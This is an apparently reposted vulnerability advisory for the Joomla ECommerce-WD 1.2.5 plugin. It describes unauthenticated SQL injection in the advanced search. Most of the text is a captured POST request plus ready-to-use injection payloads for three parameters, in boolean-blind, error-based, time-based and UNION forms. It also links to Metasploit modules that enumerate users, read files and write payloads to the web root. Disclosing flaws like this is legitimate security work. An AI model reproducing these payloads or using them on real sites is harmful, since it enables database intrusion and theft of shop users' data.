Joomla ECommerce-WD Plugin 1.2.5 – SQL Injection

</pre>
Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple
unauthenticated SQL injections available via the advanced search
functionality.

[url]http://extensions.joomla.org/extension/ecommerce-wd[/url]

The vulnerable parameters are search_category_id, sort_order, and
filter_manufacturer_ids within the following request:

POST
/index.php?option=com_ecommercewd&controller=products&task=displayproducts
HTTP/1.1
Host: 172.31.16.49
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101
Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
[url]http://172.31.16.49/index.php?option=com_ecommercewd&view=products&layout=displayproducts&Itemid=120[/url]
Cookie: 78fdafa5595397a1fc885bb2f0d74010=q1q1ud2sr0la18o5b38mkbdak2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 321

product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12


Vectors:

Parameter: filter_manufacturer_ids (POST)
 Type: boolean-based blind
 Title: AND boolean-based blind - WHERE or HAVING clause
 Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
AND 8066=8066 AND
(7678=7678&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

 Type: error-based
 Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
 Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
(ELT(7197=7197,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
(1212=1212&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

 Type: AND/OR time-based blind
 Title: MySQL > 5.0.11 AND time-based blind (SELECT)
 Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND
(1480=1480&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12



Parameter: search_category_id (POST)
 Type: boolean-based blind
 Title: AND boolean-based blind - WHERE or HAVING clause
 Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
AND 3039=3039 AND
(6271=6271&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

 Type: error-based
 Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
 Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
(ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
(8257=8257&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

 Type: AND/OR time-based blind
 Title: MySQL > 5.0.11 AND time-based blind (SELECT)
 Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND
(1251=1251&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

 Type: UNION query
 Title: Generic UNION query (NULL) - 1 column
 Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)--
&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12



Parameter: sort_order (POST)
 Type: boolean-based blind
 Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
 Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT
(CASE WHEN (8973=8973) THEN 1 ELSE 8973*(SELECT 8973 FROM
INFORMATION_SCHEMA.CHARACTER_SETS)
END))&pagination_limit_start=0&pagination_limit=12

 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.11 time-based blind - ORDER BY, GROUP BY clause
 Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT
(CASE WHEN (6064=6064) THEN SLEEP(5) ELSE 6064*(SELECT 6064 FROM
INFORMATION_SCHEMA.CHARACTER_SETS)
END))&pagination_limit_start=0&pagination_limit=12


Metasploit modules that exploit the UNION-based injection are available on
ExploitHub:

Enumerate users --
[url]https://exploithub.com/joomla-e-commerce-wd-plugin-users-enumeration-via-sql-injection.html[/url]
Read files --
[url]https://exploithub.com/joomla-e-commerce-wd-plugin-file-download-via-sql-injection.html[/url]
Write payload to web directory --
[url]https://exploithub.com/joomla-e-commerce-wd-plugin-sql-injection.html[/url]

--
[url]http://volatile-minds.blogspot.com[/url] -- blog
[url]http://www.volatileminds.net[/url] -- website
#
<pre>

本文固定链接: https://www.unhonker.com/bug/1699.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2015年03月20日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Joomla ECommerce-WD Plugin 1.2.5 – SQL Injection | 90' s Blog|关注网络信息安全
关键字:

Joomla ECommerce-WD Plugin 1.2.5 – SQL Injection:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!